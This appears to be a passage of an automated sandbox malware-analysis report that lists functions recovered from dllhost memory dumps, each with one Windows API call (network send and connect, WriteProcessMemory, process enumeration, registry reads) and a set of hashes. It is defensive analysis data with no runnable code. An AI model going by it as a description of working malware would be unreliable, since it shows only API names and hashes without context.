Instruction Fuzzy Hash: E01181B1605380AFDB11CE15DC45B57FFE8EF55620F0884AAED45CB652D275E804CB61

Function 06863696 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 068636EF

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: 2ee21de139274d2c8df32d0daa0f60ec7feca832de22ecc1772f747aff588e45
Instruction ID: 8398d46d477c0885eb4f235c4aa5ce979791350d3f3ea4f9b9210ecf13c42c32
Opcode Fuzzy Hash: 2ee21de139274d2c8df32d0daa0f60ec7feca832de22ecc1772f747aff588e45
Instruction Fuzzy Hash: E711BFB5504244AFFB21CF16DC45BAAFBE8EF44624F08846AFE05CB241D775A5048AB2

Function 0686247D Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CoGetObjectContext.COMBASE(?,?), ref: 068624EF

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: ContextObject
String ID:
API String ID: 3343934925-0
Opcode ID: 0ec6b992fd8717c92bbbd4e58a8e819920a4a1d1916d578575db6ecfe0ae93da
Instruction ID: f4454efbf81d26fb1b43c7aff84ee3454e4516396c0cd9b52c7202c46d4c6f85
Opcode Fuzzy Hash: 0ec6b992fd8717c92bbbd4e58a8e819920a4a1d1916d578575db6ecfe0ae93da
Instruction Fuzzy Hash: 5A21A2714083809FDB528F25CD49B51FFB4EF47220F0980DEED858F2A3D265A909DB62

Function 0083AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083AAD1

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 39dc4071aff9a411f25883f61d6533dce8b2b44729c0a41f486ec3d25d23477c
Instruction ID: 9a4deca51df380416849fe78f7dc8444a5633ff68aefceab68a5173b5a52b3f7
Opcode Fuzzy Hash: 39dc4071aff9a411f25883f61d6533dce8b2b44729c0a41f486ec3d25d23477c
Instruction Fuzzy Hash: C611EF76404204AFEB21CF51CD44FAAFBE8EF44724F08886AEE458B252D375A404CBB2

Function 068607FC Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0686085E

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: f2d68008f783ac0dd0c7b387ca19c7babd58b45ec1a17aaeb9fdad7045b0c930
Instruction ID: 49a82e392f83c79b885dae48bf3c14b9b7c5517f7767d180ef03b6157cb8f9bf
Opcode Fuzzy Hash: f2d68008f783ac0dd0c7b387ca19c7babd58b45ec1a17aaeb9fdad7045b0c930
Instruction Fuzzy Hash: 631184715053809FD711CF66DD45B56FFE8EF45220F0884ABED49CB262D235E818CB61

Function 0083BEF4 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,?,?,?), ref: 0083BF61

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: d6ba8d52551f3e9d169e864ad22e6bed33a9bff4737d65050946047f634c41e7
Instruction ID: 8faab17aef8f64fe2c0579846ee36aefd9d1a091bba7c3dd1f06126e6a6dd2d5
Opcode Fuzzy Hash: d6ba8d52551f3e9d169e864ad22e6bed33a9bff4737d65050946047f634c41e7
Instruction Fuzzy Hash: 8A1149B6504380AFEB218E15DC45B62FFA8EF55624F09809AED84DB652D265E808CBA1

Function 0686394A Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 068639A3

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 5f032d430347a23122ace1ca9a09ec4ad0ad25d9ec7914fb4699b7c4d84e724a
Instruction ID: 822869d78a4a1aed49f4171b32800614d4e20e90b23a1ce58da38faf4f547953
Opcode Fuzzy Hash: 5f032d430347a23122ace1ca9a09ec4ad0ad25d9ec7914fb4699b7c4d84e724a
Instruction Fuzzy Hash: 6211E379504204AFFB21CF11DC45BAAFBE8EF44728F08846AFE45CB241D775A404CAB2

Function 0083BB31 Relevance: 1.6, APIs: 1, Instructions: 57comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0083BB90

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 38c439353ae2602a11f80dbe241d7d8184005fd884bc3c6ce4166d5fc4146c16
Instruction ID: 0dcd5ba1ef22cc0324e65e7e39d1ff04327edc2d6301014ac7b273f6f0b6da2f
Opcode Fuzzy Hash: 38c439353ae2602a11f80dbe241d7d8184005fd884bc3c6ce4166d5fc4146c16
Instruction Fuzzy Hash: 3C112E714093C05FDB128B65DC55B92BFB4EF46220F0984DBED848F153D265A958CBA1

Function 06861D2E Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 06861D84

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 4030ee9c70dfa6d6d00a5c91aaaf7e5b3535ab55df25903fc76d18faac02e0db
Instruction ID: 7b57c1a47f505a874fe9133758449cacc0a697579f095df8bbe4c9ec5910cd90
Opcode Fuzzy Hash: 4030ee9c70dfa6d6d00a5c91aaaf7e5b3535ab55df25903fc76d18faac02e0db
Instruction Fuzzy Hash: 4311C275504204AFFB21CF16DC49BAAFBE8DF44724F0884AAFE44DB242D375A5048AB2

Function 0083A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083A6A8

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 60d69eae10a9342c4949ce772cee90f57e60b42750d1ef0460db7ceacdca7ac3
Instruction ID: 6a270d0dce330d1ae24eb985fffce127397c0404149854c3559a6834473e607d
Opcode Fuzzy Hash: 60d69eae10a9342c4949ce772cee90f57e60b42750d1ef0460db7ceacdca7ac3
Instruction Fuzzy Hash: F5117C754097C05FDB128B25D845A52BFB4EF47220F0984DAD8898F163D265A948CB62

Function 06862552 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 068625BB

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a509a59d2ecb57a3c9c395bef46318dbdc16f92a3537f315b8861e831e14792d
Instruction ID: f8a474f1cd2eb16cba07270a790608bd5177d5f100f9c41e231258228c32acb4
Opcode Fuzzy Hash: a509a59d2ecb57a3c9c395bef46318dbdc16f92a3537f315b8861e831e14792d
Instruction Fuzzy Hash: DA112575504204AFF760CF12DC4AFBAFBA8DF04724F04809AFE049B285D3B4A604CAB2

Function 06863A26 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 06863A7C

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 2e9e32e34239fe150fbddbfbe540daebd77aeaddfc34454e89307cc679ecff2e
Instruction ID: 85ad2f3b640894d7195ab3c6b3dfdfb62dbb70c5dc731501543ab8522ba43da0
Opcode Fuzzy Hash: 2e9e32e34239fe150fbddbfbe540daebd77aeaddfc34454e89307cc679ecff2e
Instruction Fuzzy Hash: 8211A3755046049FEB60CF56C884F56F7E8EF04621F08C4AAEE49DB252E331E404DB71

Function 0083A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0083A0D5

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 28826d57db6938c89e2058eaeeb86d65576781754b17c1a26031e2f2a17f8e67
Instruction ID: 9ff7193b70b2e0f440888cf55904791dc237f5c7c13da5c33983bd0cac7c91c7
Opcode Fuzzy Hash: 28826d57db6938c89e2058eaeeb86d65576781754b17c1a26031e2f2a17f8e67
Instruction Fuzzy Hash: 69118F71409380AFDB22CF55DD44B56FFB4EF4A224F08849AED898B563D275A818CB62

Function 0083AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083AE56

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 122d9d71029ed6b1f0718082baf7b5b8d01fcb3d6ed7ff3f547133c611d61cfe
Instruction ID: 6bb6992cb622d051e9bd95929e1ec7bae52fe49381ed17aa35ea7ae7a525eb91
Opcode Fuzzy Hash: 122d9d71029ed6b1f0718082baf7b5b8d01fcb3d6ed7ff3f547133c611d61cfe
Instruction Fuzzy Hash: 6D11E5716002408FEB14CF15DC41B52FBD8EF44720F08846AED49CB242D335E804CAB2

Function 0083B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0083B22E

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 122d9d71029ed6b1f0718082baf7b5b8d01fcb3d6ed7ff3f547133c611d61cfe
Instruction ID: 4ba9074c8922c595b5ba919b1a7430963cc6ec74d0b99119ea517474a8eb876b
Opcode Fuzzy Hash: 122d9d71029ed6b1f0718082baf7b5b8d01fcb3d6ed7ff3f547133c611d61cfe
Instruction Fuzzy Hash: CD11E5B16042008FEB10CF1ADC45B57FBD8EF44720F0885AAEE09CB652D335E804CAB1

Function 0083AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083ACE0

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 7a41a4c00152b1237bfa920d7a4c221893f304bf5c2240e73ab76d9613d0a70d
Instruction ID: 4ce5a00edf0404d6147e894396cfb072031fc5bd535365abd4885b3c756da7a7
Opcode Fuzzy Hash: 7a41a4c00152b1237bfa920d7a4c221893f304bf5c2240e73ab76d9613d0a70d
Instruction Fuzzy Hash: 7511A5755093809FDB128F15DC85B52FFB4DF46221F0880EBED858B6A3D275A908CBA2

Function 0083A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083A935

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 195ad9f8dfac3add6a87df60d4aefe73e66a1467defabbddd7d0b79f2524eb74
Instruction ID: d97d60c7db575ebbc88f638157cd08d548179fdaff1e8e80a97b0d5e353b71b7
Opcode Fuzzy Hash: 195ad9f8dfac3add6a87df60d4aefe73e66a1467defabbddd7d0b79f2524eb74
Instruction Fuzzy Hash: CC01C479504204AEF710CF05DC45BAAFB9CEF44724F19809AEE449B251D378A9048AB6

Function 068621CA Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 06862216

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 350ef1b304fe5b1276630926c9493c2ce63d3898f9372b635f425cec54d7ecf0
Instruction ID: 7334aa17d5f9c3ab133948b4f5bcc4c4f4ba3cbe24be85349cc8830dcfa160f3
Opcode Fuzzy Hash: 350ef1b304fe5b1276630926c9493c2ce63d3898f9372b635f425cec54d7ecf0
Instruction Fuzzy Hash: 7A118E715142449FEB21CF56D945B56FBE4EF08720F0889AAEE498B622D332E514CFA2

Function 0686081E Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0686085E

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: f22c91b8c30a2bec652a08fc6b2c985fbda84d63847c79800e9d48ec53b26770
Instruction ID: a12156fd66f50ee61a31cf23c6b8c862b962ccfc0577c2f9196ff4a11a99bc48
Opcode Fuzzy Hash: f22c91b8c30a2bec652a08fc6b2c985fbda84d63847c79800e9d48ec53b26770
Instruction Fuzzy Hash: 9211A1719042448FEB50CF5ADD85B5AFBE4EF44220F0884ABEE49CB662D371E414CBA1

Function 06861040 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 06861094

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 370a359734e12d038fe52d267313a40784d267a429bddffdcf653a1f2bf790e5
Instruction ID: f005cf1a0c3aa6b7efc8b8c34b00c59cc09146894c15f2bc95a84dea48dc4d4f
Opcode Fuzzy Hash: 370a359734e12d038fe52d267313a40784d267a429bddffdcf653a1f2bf790e5
Instruction Fuzzy Hash: C61188715093C49FDB128F15DC44B62FFB4DF46624F0880DAED858B653D275A818CB72

Function 0083A172 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,00000E24,?,?), ref: 0083A1BD

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: a85ddceb274a7c0936c364d845dfc18f1ceca6c6fb02b642e3dd475a4cd1919e
Instruction ID: 4d9da3ca06c85576862cc695e25eaafc9461982e973d24baf98439afd5efd403
Opcode Fuzzy Hash: a85ddceb274a7c0936c364d845dfc18f1ceca6c6fb02b642e3dd475a4cd1919e
Instruction Fuzzy Hash: FA0171B1500200AFD310DF16DD46B76FBE8EB88A20F14856AED089B741E735F915CBE6

Function 068622C6 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 06862316

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 35138aa511666fd3e42663e87567792bf1ce38af59a6ad71226538530c27dcfb
Instruction ID: 1cdea05be260cbf8ae1fc6ec200e18945c9a363886c7b24e71cb28c0c5d59cc7
Opcode Fuzzy Hash: 35138aa511666fd3e42663e87567792bf1ce38af59a6ad71226538530c27dcfb
Instruction Fuzzy Hash: 130171B1500200AFD310DF16DD46B76FBE8EB88A20F14856AED089B741E735F915CBE6

Function 0083BF16 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,?,?,?), ref: 0083BF61

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: db03310386d8d10bb14a2db0b024dc96d40db8d0465bdf8b4dc29aa831732887
Instruction ID: ccdc5ef34d9e9505892604891f50e637246caa46c58aeaf0a953fdf1e66c7ee6
Opcode Fuzzy Hash: db03310386d8d10bb14a2db0b024dc96d40db8d0465bdf8b4dc29aa831732887
Instruction Fuzzy Hash: FD0161B55002049FEB208E15DD45B12FBE4EF54724F08809ADE45CB652D775E804CEA1

Function 0083BCEE Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0083BD32

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6ecb7f277fec40d3946d5ba09222e0432e716d34468d4faa61487930397c004b
Instruction ID: 4f5c82b64e313c2f86b8316092625951c4a43bfcd3075aa956fff8744e54315e
Opcode Fuzzy Hash: 6ecb7f277fec40d3946d5ba09222e0432e716d34468d4faa61487930397c004b
Instruction Fuzzy Hash: A801AD714046449FEB218F55D945B52FBE0FF48720F08C8AAEE498B662D336A424DFA2

Function 0083A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083A608

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 759e77e2ddd7e588aaf17dc5454b400cdbe25be35dc5383905d71f12bce04b5f
Instruction ID: 819e4bf72714fc3617cd5b3bb2d70ff99a31ed607c222f78c60099352bd76561
Opcode Fuzzy Hash: 759e77e2ddd7e588aaf17dc5454b400cdbe25be35dc5383905d71f12bce04b5f
Instruction Fuzzy Hash: 6E01AD754002008FEB20CF05D885B62FBE4FF54310F0C849AEE858B662E331E858CAA2

Function 0083BE7A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 0083BECA

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 3a2ff99d38fee92c94e82aa9b3f7436d2c9c075572aa41bd86819a1b6ad625d3
Instruction ID: 8512043765f8ca95cec05561b5ce2e772c6c76606d1fe456c3ab5ccc99632db7
Opcode Fuzzy Hash: 3a2ff99d38fee92c94e82aa9b3f7436d2c9c075572aa41bd86819a1b6ad625d3
Instruction Fuzzy Hash: 3501A2B1500200ABD210DF16CC46B36FBE8FB88A20F14812AED085BB41E731F915CBE6

Function 06863BFA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.KERNEL32(?,00000E24,?,?), ref: 06863C4A

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 87e89f77eb3cbcc408804db4e9823cd14cf5529bd9634c472cbd84e7dc8246c9
Instruction ID: caaab053e43834f6da4d0b6b0b3f895bfda4f6cb88e1096e2a716fa35da210c5
Opcode Fuzzy Hash: 87e89f77eb3cbcc408804db4e9823cd14cf5529bd9634c472cbd84e7dc8246c9
Instruction Fuzzy Hash: 2F01A2B1500200ABD210DF16CC46B36FBE8FB88A20F14812AED085BB41E731F915CBE6

Function 06861412 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 06861462

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ec0d3d22661be061559dcbb7f850825d822c8213e86fad1e227fa375ddb4da86
Instruction ID: d86789bfcf95c57bdbb7006044ac38893e7bf2f1c56c5764b5e6760a77d0695e
Opcode Fuzzy Hash: ec0d3d22661be061559dcbb7f850825d822c8213e86fad1e227fa375ddb4da86
Instruction Fuzzy Hash: B601A2B1500200ABD210DF16CC46B36FBE8FB88A20F14812AED085BB41E771F915CBE6

Function 0083A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0083A0D5

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 569e911f7bef498e25e2d0a479fb377df91f28b67cbec69badaf0c15f07cb96f
Instruction ID: a646c60fdf9a26992cb6041e9b9dd3128502212e1c7c484dc6d8ef9d8ba7337f
Opcode Fuzzy Hash: 569e911f7bef498e25e2d0a479fb377df91f28b67cbec69badaf0c15f07cb96f
Instruction Fuzzy Hash: 5501B171404640DFEB20CF55D984B56FBE4FF44724F08C4AAEE898B652D376A414CBB2

Function 0083ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083ACE0

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: de76c31f2ced00f1f2e380b3cb9fd5e39a58537804f3016f0c94ea0b70993816
Instruction ID: 5367bbdcada4bf83ed10d05354df64362668a5f91e330666f13d29b09ec568bd
Opcode Fuzzy Hash: de76c31f2ced00f1f2e380b3cb9fd5e39a58537804f3016f0c94ea0b70993816
Instruction Fuzzy Hash: D401F4755042448FEB208F1AD985762FBE4EF44325F08C0AADD498BB52D375E804CEE3

Function 0083BB5E Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0083BB90

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4d21802f3d146d4f0b7cda56be7d15f16251acaa33428323bc340bd7a644d363
Instruction ID: 28f6444ad260e447e9d71db8b98290a8d008fba21ec99c1069159de55075687f
Opcode Fuzzy Hash: 4d21802f3d146d4f0b7cda56be7d15f16251acaa33428323bc340bd7a644d363
Instruction Fuzzy Hash: 9501A2B48042448FEB10CF16D985756FBE4EF44734F08C8AADE088F256D775A804CAA2

Function 068624BA Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CoGetObjectContext.COMBASE(?,?), ref: 068624EF

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: ContextObject
String ID:
API String ID: 3343934925-0
Opcode ID: ba2d244952c64c9a2b00312bc4c4a154a1666bad1c339bd3dc3317404ff56dfc
Instruction ID: c61f2925697b493b1daf7f2bb2a03bebd8f2befd40e84647b75bb0c934a762a4
Opcode Fuzzy Hash: ba2d244952c64c9a2b00312bc4c4a154a1666bad1c339bd3dc3317404ff56dfc
Instruction Fuzzy Hash: CAF0F4348042449FEB60CF06D989B65FBE0EF44224F0CC0EAEE498B652D375E504CEA2

Function 0083A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083A6A8

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 04ad49fbc036094f647836f180c10ad280adc9195e76fb03f0c78898001393e3
Instruction ID: 70a15ad73ffa1978ff9fd3f12653c0a886c32a33cd6c7da659df8b93aafed363
Opcode Fuzzy Hash: 04ad49fbc036094f647836f180c10ad280adc9195e76fb03f0c78898001393e3
Instruction Fuzzy Hash: 3BF0AF744042448FEB108F16D986762FBE4EF54724F0CC4AADD4A8B762E375E814CEA3

